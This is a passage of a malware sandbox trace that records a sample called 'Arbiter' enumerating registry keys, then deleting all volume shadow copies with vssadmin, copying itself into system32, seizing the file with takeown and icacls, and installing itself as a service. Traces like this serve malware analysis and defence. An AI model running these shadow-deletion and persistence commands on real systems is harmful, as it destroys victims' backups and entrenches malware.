cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0032.364] lstrlenW (lpString="TabletPC") returned 8 [0032.364] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27d708 [0032.364] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0032.364] lstrlenW (lpString="Terminal Server") returned 15 [0032.364] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d730 [0032.364] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0032.364] lstrlenW (lpString="TimeZoneInformation") returned 19 [0032.364] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x16) returned 0x2784b0 [0032.364] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0032.364] lstrlenW (lpString="usbflags") returned 8 [0032.364] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d780 [0032.364] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0032.364] lstrlenW (lpString="usbstor") returned 7 [0032.364] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d7a8 [0032.365] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0032.365] lstrlenW (lpString="VAN") returned 3 [0032.365] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x2784f0 [0032.365] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0032.365] lstrlenW (lpString="Video") returned 5 [0032.365] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x278510 [0032.365] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0032.365] lstrlenW (lpString="wcncsvc") returned 7 [0032.365] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d7d0 [0032.365] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0032.365] lstrlenW (lpString="Wdf") returned 3 [0032.365] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278530 [0032.365] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0032.365] lstrlenW (lpString="WDI") returned 3 [0032.365] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278550 [0032.365] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0032.365] lstrlenW (lpString="Windows") returned 7 [0032.365] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x27d7f8 [0032.365] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0032.365] lstrlenW (lpString="Winlogon") returned 8 [0032.365] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d820 [0032.366] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0032.366] lstrlenW (lpString="WMI") returned 3 [0032.366] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278570 [0032.366] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0032.366] lstrlenW (lpString="hivelist") returned 8 [0032.366] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1e) returned 0x27d848 [0032.366] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0032.366] lstrlenW (lpString="SystemInformation") returned 17 [0032.366] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27e038 [0032.366] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0032.366] lstrlenW (lpString="Winresume") returned 9 [0032.366] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x27e038 [0032.366] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0032.366] RegCloseKey (hKey=0xc4) returned 0x0 [0032.366] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin\" -r" [0032.366] StrChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin\" -r", wMatch=0x22) returned="\" -r" [0032.366] StrChrW (lpStart="\" -r", wMatch=0x20) returned=" -r" [0032.366] StrTrimW (in: psz="-r", pszTrimChars=" " | out: psz="-r") returned 0 [0032.366] GetVersion () returned 0x1db10106 [0032.366] GetCurrentProcess () returned 0xffffffff [0032.366] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff24 | out: TokenHandle=0x18ff24*=0xc4) returned 1 [0032.367] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x14, TokenInformation=0x18ff1c, TokenInformationLength=0x4, ReturnLength=0x18ff28 | out: TokenInformation=0x18ff1c, ReturnLength=0x18ff28) returned 1 [0032.367] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff28 | out: TokenInformation=0x0, ReturnLength=0x18ff28) returned 0 [0032.367] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14) returned 0x278590 [0032.367] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x19, TokenInformation=0x278590, TokenInformationLength=0x14, ReturnLength=0x18ff28 | out: TokenInformation=0x278590, ReturnLength=0x18ff28) returned 1 [0032.367] GetSidSubAuthorityCount (pSid=0x278598*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x278599 [0032.367] GetSidSubAuthority (pSid=0x278598*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2785a0 [0032.367] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x278590 | out: hHeap=0x260000) returned 1 [0032.367] CloseHandle (hObject=0xc4) returned 1 [0032.367] CommandLineToArgvW (in: lpCmdLine="-r", pNumArgs=0x18ff64 | out: pNumArgs=0x18ff64) returned 0x26f070*="-r" [0032.367] lstrlenW (lpString="-r") returned 2 [0032.367] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0032.367] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x27e820 [0032.367] GetWindowsDirectoryW (in: lpBuffer=0x27e820, uSize=0xc | out: lpBuffer="C:\\Windows") returned 0xa [0032.367] lstrcpyW (in: lpString1=0x27e836, lpString2="system32" | out: lpString1="system32") returned="system32" [0032.367] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1a) returned 0x27e060 [0032.367] lstrcpyW (in: lpString1=0x27e848, lpString2="Arbiter" | out: lpString1="Arbiter") returned="Arbiter" [0032.367] lstrcatW (in: lpString1="C:\\Windows\\system32\\Arbiter", lpString2=".exe" | out: lpString1="C:\\Windows\\system32\\Arbiter.exe") returned="C:\\Windows\\system32\\Arbiter.exe" [0032.368] PathFileExistsW (pszPath="C:\\Windows\\system32\\Arbiter.exe") returned 0 [0032.368] lstrlenW (lpString="C:\\Windows\\system32\\Arbiter.exe") returned 31 [0032.368] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x246) returned 0x27ea48 [0032.368] lstrcpyW (in: lpString1=0x27ea70, lpString2="vssadmin.exe Delete Shadows /All /Quiet" | out: lpString1="vssadmin.exe Delete Shadows /All /Quiet") returned="vssadmin.exe Delete Shadows /All /Quiet" [0032.368] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0032.368] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x76d5ebe8 [0032.368] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0032.368] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18feb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fefc | out: lpCommandLine="C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x18fefc*(hProcess=0xc8, hThread=0xc4, dwProcessId=0x598, dwThreadId=0x568)) returned 1 [0032.380] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 [0032.380] WaitForSingleObject (hHandle=0xc8, dwMilliseconds=0xffffffff) returned 0x0 [0065.292] GetExitCodeProcess (in: hProcess=0xc8, lpExitCode=0x18ff2c | out: lpExitCode=0x18ff2c*=0x0) returned 1 [0065.316] CloseHandle (hObject=0xc4) returned 1 [0065.316] CloseHandle (hObject=0xc8) returned 1 [0065.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\arbiter:bin"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0065.317] GetFileSize (in: hFile=0xc8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x112f90 [0065.317] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x112f92) returned 0x20d0020 [0065.317] ReadFile (in: hFile=0xc8, lpBuffer=0x20d0020, nNumberOfBytesToRead=0x112f90, lpNumberOfBytesRead=0x18ff08, lpOverlapped=0x0 | out: lpBuffer=0x20d0020*, lpNumberOfBytesRead=0x18ff08*=0x112f90, lpOverlapped=0x0) returned 1 [0065.348] CloseHandle (hObject=0xc8) returned 1 [0065.356] CreateFileW (lpFileName="C:\\Windows\\system32\\Arbiter.exe" (normalized: "c:\\windows\\system32\\arbiter.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc8 [0065.425] WriteFile (in: hFile=0xc8, lpBuffer=0x20d0020*, nNumberOfBytesToWrite=0x112f90, lpNumberOfBytesWritten=0x18ff14, lpOverlapped=0x0 | out: lpBuffer=0x20d0020*, lpNumberOfBytesWritten=0x18ff14*=0x112f90, lpOverlapped=0x0) returned 1 [0065.446] SetEndOfFile (hFile=0xc8) returned 1 [0065.446] CloseHandle (hObject=0xc8) returned 1 [0065.456] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x20d0020 | out: hHeap=0x260000) returned 1 [0065.462] _snwprintf (in: _Dest=0x27ea70, _Count=0x123, _Format="takeown.exe /F %s" | out: _Dest="takeown.exe /F C:\\Windows\\system32\\Arbiter.exe") returned 46 [0065.462] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Arbiter.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18feb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fefc | out: lpCommandLine="C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Arbiter.exe", lpProcessInformation=0x18fefc*(hProcess=0xc4, hThread=0xc8, dwProcessId=0x704, dwThreadId=0xbd4)) returned 1 [0065.472] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0xffffffff) returned 0x0 [0065.827] GetExitCodeProcess (in: hProcess=0xc4, lpExitCode=0x18ff2c | out: lpExitCode=0x18ff2c*=0x0) returned 1 [0065.827] CloseHandle (hObject=0xc8) returned 1 [0065.827] CloseHandle (hObject=0xc4) returned 1 [0065.827] _snwprintf (in: _Dest=0x27ea70, _Count=0x123, _Format="icacls.exe %s /reset" | out: _Dest="icacls.exe C:\\Windows\\system32\\Arbiter.exe /reset") returned 49 [0065.827] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Arbiter.exe /reset", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18feb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fefc | out: lpCommandLine="C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Arbiter.exe /reset", lpProcessInformation=0x18fefc*(hProcess=0xc8, hThread=0xc4, dwProcessId=0x124, dwThreadId=0x9e8)) returned 1 [0065.835] WaitForSingleObject (hHandle=0xc8, dwMilliseconds=0xffffffff) returned 0x0 [0066.009] GetExitCodeProcess (in: hProcess=0xc8, lpExitCode=0x18ff2c | out: lpExitCode=0x18ff2c*=0x0) returned 1 [0066.009] CloseHandle (hObject=0xc4) returned 1 [0066.009] CloseHandle (hObject=0xc8) returned 1 [0066.009] lstrlenW (lpString="C:\\Windows\\system32\\Arbiter.exe") returned 31 [0066.010] lstrlenW (lpString="") returned 0 [0066.010] lstrlenW (lpString="-s") returned 2 [0066.010] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x48) returned 0x27eea8 [0066.010] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x2) returned 0x27e128 [0066.011] CreateServiceW (in: hSCManager=0x27e128, lpServiceName="Arbiter", lpDisplayName="Arbiter", dwDesiredAccess=0xf01ff, dwServiceType=0x10, dwStartType=0x3, dwErrorControl=0x0, lpBinaryPathName="C:\\Windows\\system32\\Arbiter.exe -s", lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x27e088 [0066.078] StartServiceW (hService=0x27e088, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 1 [0069.734] Sleep (dwMilliseconds=0x64) [0070.017] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0070.018] ControlService (in: hService=0x27e088, dwControl=0x1, lpServiceStatus=0x18fee4 | out: lpServiceStatus=0x18fee4*(dwServiceType=0x10, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0070.022] Sleep (dwMilliseconds=0x3e8) [0071.766] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0071.767] Sleep (dwMilliseconds=0x3e8) [0072.798] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0072.798] Sleep (dwMilliseconds=0x3e8) [0073.824] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0073.825] Sleep (dwMilliseconds=0x3e8) [0075.155] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0075.155] Sleep (dwMilliseconds=0x3e8) [0076.229] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0076.230] Sleep (dwMilliseconds=0x3e8) [0077.634] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0077.635] Sleep (dwMilliseconds=0x3e8) [0078.706] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0078.706] Sleep (dwMilliseconds=0x3e8) [0079.767] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0079.767] Sleep (dwMilliseconds=0x3e8) [0080.848] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0080.848] Sleep (dwMilliseconds=0x3e8) [0081.889] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0081.889] Sleep (dwMilliseconds=0x3e8) [0083.684] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0083.685] Sleep (dwMilliseconds=0x3e8) [0084.899] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0084.900] Sleep (dwMilliseconds=0x3e8) [0086.170] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0086.171] Sleep (dwMilliseconds=0x3e8) [0088.458] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0088.459] Sleep (dwMilliseconds=0x3e8) [0090.097] QueryServiceStatusEx (in: hService=0x27e088, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0090.098] Sleep (dwMilliseconds=0x3e8) Thread: id = 36 os_tid = 0xb9c Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4b638000" os_pid = "0x598" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x6f4" cmd_line = "C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x568 Thread: id = 4 os_tid = 0x51c Thread: id = 5 os_tid = 0x518 Thread: id = 6 os_tid = 0x55c Thread: id = 7 os_tid = 0xb48 Process: id = "4" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4ae29000" os_pid = "0xb4c" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005b554" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 8 os_tid = 0xb78 Thread: id = 9 os_tid = 0xb6c [0035.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108d860 | out: lpSystemTimeAsFileTime=0x108d860*(dwLowDateTime=0xbd0b9040, dwHighDateTime=0x1d64ac6)) [0035.110] GetCurrentProcessId () returned 0xb4c [0035.110] GetCurrentThreadId () returned 0xb6c [0035.110] GetTickCount () returned 0x1143e97 [0035.110] QueryPerformanceCounter (in: lpPerformanceCount=0x108d868 | out: lpPerformanceCount=0x108d868*=15573379877) returned 1 [0035.110] malloc (_Size=0x100) returned 0x3a8e80 Thread: id = 10 os_tid = 0xb20 Thread: id = 11 os_tid = 0xb24 Thread: id = 12 os_tid = 0xb28 Thread: id = 13 os_tid = 0xb74 Thread: id = 14 os_tid = 0xb70 Thread: id = 28 os_tid = 0xb50 Thread: id = 35 os_tid = 0xb88 Thread: id = 39 os_tid = 0x644 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 15 os_tid = 0xa20 Thread: id = 16 os_tid = 0x768 Thread: id = 17 os_tid = 0x764 Thread: id = 18 os_tid = 0x758 Thread: id = 19 os_tid = 0x724 Thread: id = 20 os_tid = 0x718 Thread: id = 21 os_tid = 0x714 Thread: id = 22 os_tid = 0x630 Thread: id = 23 os_tid = 0x154 Thread: id = 24 os_tid = 0x150 Thread: id = 25 os_tid = 0x120 Thread: id = 26 os_tid = 0x118 Thread: id = 27 os_tid = 0xf0 Thread: id = 38 os_tid = 0x868 Thread: id = 365 os_tid = 0x640 Thread: id = 384 os_tid = 0x9a8 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4bd2e000" os_pid = "0xb68" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005b9fc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 29 os_tid = 0xb7c Thread: id = 30 os_tid = 0xb54 Thread: id = 31 os_tid = 0xb58 Thread: id = 32 os_tid = 0xb5c Thread: id = 33 os_tid = 0xb60 Thread: id = 34 os_tid = 0xb64 Thread: id = 40 os_tid = 0x600 Process: id = "7" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x45f59000" os_pid = "0x704" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x6f4" cmd_line = "C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Arbiter.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 41 os_tid = 0xbd4 Process: id = "8" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x46a5f000" os_pid = "0x124" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x6f4" cmd_line = "C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Arbiter.exe /reset" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 42 os_tid = 0x9e8 Process: id = "9" image_name = "System" filename = "" page_root = 